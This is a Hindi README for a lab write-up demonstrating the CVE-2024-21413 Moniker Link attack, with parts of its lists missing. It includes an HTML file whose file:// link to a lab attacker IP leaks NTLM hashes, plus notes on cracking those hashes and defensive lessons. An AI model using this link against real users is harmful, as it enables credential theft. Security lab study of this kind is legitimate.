
पेनिट्रेशन टेस्टिंग लैब जो CVE-2024-21413 मॉनिकर लिंक एक्सप्लॉइटेशन को प्रदर्शित करता है, जिसमें NTLM क्रेडेंशियल चोरी, हमले का निष्पादन, हैश क्रैकिंग और रक्षात्मक उपाय शामिल हैं।
NTLM क्रेडेंशियल चोरी के लिए CVE-2024-21413 Moniker Link शोषण का प्रदर्शन करने वाली व्यावहारिक पैठ परीक्षण प्रयोगशाला। यह परियोजना सेटअप से लेकर क्रेडेंशियल समझौता तक पूर्ण हमले की श्रृंखला का दस्तावेजीकरण करती है, जिसमें वास्तविक दुनिया की चुनौतियाँ और समाधान शामिल हैं।
मुख्य उपलब्धि: पृथक प्रयोगशाला वातावरण (Windows 10 VM) और वास्तविक प्रणाली (Windows 11 PC) दोनों पर Moniker Link हमले को सफलतापूर्वक निष्पादित किया, जो व्यावहारिक सुरक्षा कमजोरियों और रक्षात्मक उपायों का प्रदर्शन करता है।
हमला मशीन:
लक्ष्य प्रणालियाँ:
नेटवर्क कॉन्फ़िगरेशन:
HTML फ़ाइल (test.html):
<!DOCTYPE html>
<html>
<body>
<p><a href="file://192.168.56.10/test">click me</a></p>
</body>
</html>
File Explorer विधि:
\\192.168.56.101\test टाइप करता हैसमस्या:
मूल कारण:
समाधान:
सीख: डिफ़ॉल्ट Windows फ़ायरवॉल इस हमले के विरुद्ध प्रभावी सुरक्षा प्रदान करता है। उपयोगकर्ताओं को इसे सक्षम रखना चाहिए।
समस्या:
nwigwecj112Honey (गलत पासवर्ड!)12Honey पिछले परीक्षण से थामूल कारण:
~/.john/john.pot में सहेजता हैसमाधान:
1414 में बदलासीख: हमेशा सत्यापित करें कि आप सही हैश क्रैक कर रहे हैं। पॉट फ़ाइल साफ़ करें या परीक्षण के लिए अद्वितीय पासवर्ड का उपयोग करें।
समस्या:
1414 rockyou.txt (14 मिलियन पासवर्ड) में नहीं मिलामूल कारण:
समाधान:
echo "1414" > passwords.txt
echo "4141" >> passwords.txt
सीख: "Rockyou.txt में नहीं है" ≠ सुरक्षित। छोटे पासवर्ड वर्डलिस्ट उपस्थिति की परवाह किए बिना लक्षित हमलों और ब्रूट फोर्स के प्रति संवेदनशील होते हैं।
✅ Windows फ़ायरवॉल - सक्षम होने पर हमले को पूरी तरह से अवरुद्ध किया ✅ आधुनिक ब्राउज़र - Chrome/Edge रिमोट file:// लिंक को ब्लॉक करते हैं ✅ उपयोगकर्ता जागरूकता - मैन्युअल संकेत के लिए उपयोगकर्ता कार्रवाई आवश्यक
❌ कमज़ोर पासवर्ड - 4-अक्षर संख्यात्मक आसानी से क्रैक हुआ ❌ अक्षम फ़ायरवॉल - सामान्य उपयोगकर्ता गलती ❌ File Explorer - UNC पथ के लिए कोई चेतावनी नहीं ❌ NTLM प्रोटोकॉल - SMB शेयरों के लिए स्वचालित प्रमाणीकरण
1. फ़ायरवॉल महत्वपूर्ण है
2. पासवर्ड शक्ति का भ्रम
1414 rockyou.txt में नहीं है ("मजबूत" दिखता है)3. उपयोगकर्ता सहभागिता आवश्यक
आक्रामक:
बुनियादी ढांचा:
Moniker-Link-Lab-Setup/
├── README.md (यह फ़ाइल)
├── Documentation/
│ ├── attack-execution.md (चरण-दर-चरण हमला मार्गदर्शिका)
│ └── README.md (दस्तावेज़ीकरण अवलोकन)
├── Screenshots/ (हमले के स्क्रीनशॉट - जोड़े जाने हैं)
└── Scripts/ (HTML परीक्षण फ़ाइल - जोड़ी जानी है)
तकनीकी:
पेशेवर:
सभी परीक्षण अधिकृत प्रणालियों पर किए गए:
कानूनी सूचना: अनधिकृत कंप्यूटर पहुंच अवैध है। यह परियोजना केवल शैक्षिक उद्देश्यों और अधिकृत परीक्षण वातावरणों के लिए है।
LinkedIn: https://www.linkedin.com/in/chukwuemeka-nwigwe-624aa3292/ GitHub: @E-m-e-k-a
दिनांक: मार्च 2026
केवल शैक्षिक उपयोग के लिए। अनधिकृत परीक्षण के लिए नहीं।
⭐ यदि आपको यह परियोजना उपयोगी लगी, तो कृपया रिपॉजिटरी को स्टार करने पर विचार करें!
| मीट्रिक | परिणाम |
|---|
| प्रारंभिक पासवर्ड | nwigwecj1 |
| बदलकर | 1414 |
| वर्डलिस्ट | कस्टम (2 प्रविष्टियाँ) |
| क्रैक समय | <1 सेकंड |
| फ़ायरवॉल | परीक्षण के लिए अक्षम |
| स्थिति | ✅ सफलतापूर्वक समझौता |
| मीट्रिक | परिणाम |
|---|
| पासवर्ड | 1414 |
| फ़ायरवॉल | प्रारंभ में अवरुद्ध, फिर अक्षम |
| प्रमाणीकरण | मैन्युअल संकेत (क्रेडेंशियल दर्ज किए) |
| क्रैक समय | तत्काल |
| स्थिति | ✅ सफलतापूर्वक समझौता |